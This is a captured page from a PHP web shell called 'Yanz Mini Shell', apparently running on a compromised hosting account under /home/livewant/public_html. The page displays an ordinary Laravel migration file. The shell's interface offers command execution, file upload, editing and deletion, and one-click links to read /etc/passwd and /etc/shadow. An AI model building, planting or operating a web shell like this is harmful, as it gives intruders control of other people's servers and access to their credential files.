Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
livewant
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('hero_sections', function (Blueprint $table) { $table->id(); $table->string('title')->nullable(); $table->string('highlight_title_one')->nullable(); $table->string('highlight_title_two')->nullable(); $table->longText('description')->nullable(); $table->string('btn_one')->nullable(); $table->string('btn_two')->nullable(); $table->unsignedBigInteger('image_id')->nullable(); $table->foreign('image_id')->references('id')->on('images')->onDelete('set null'); $table->tinyInteger('status')->default(App\Enums\Status::ACTIVE); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('hero_sections'); } };
Free Space : 18317238272 Byte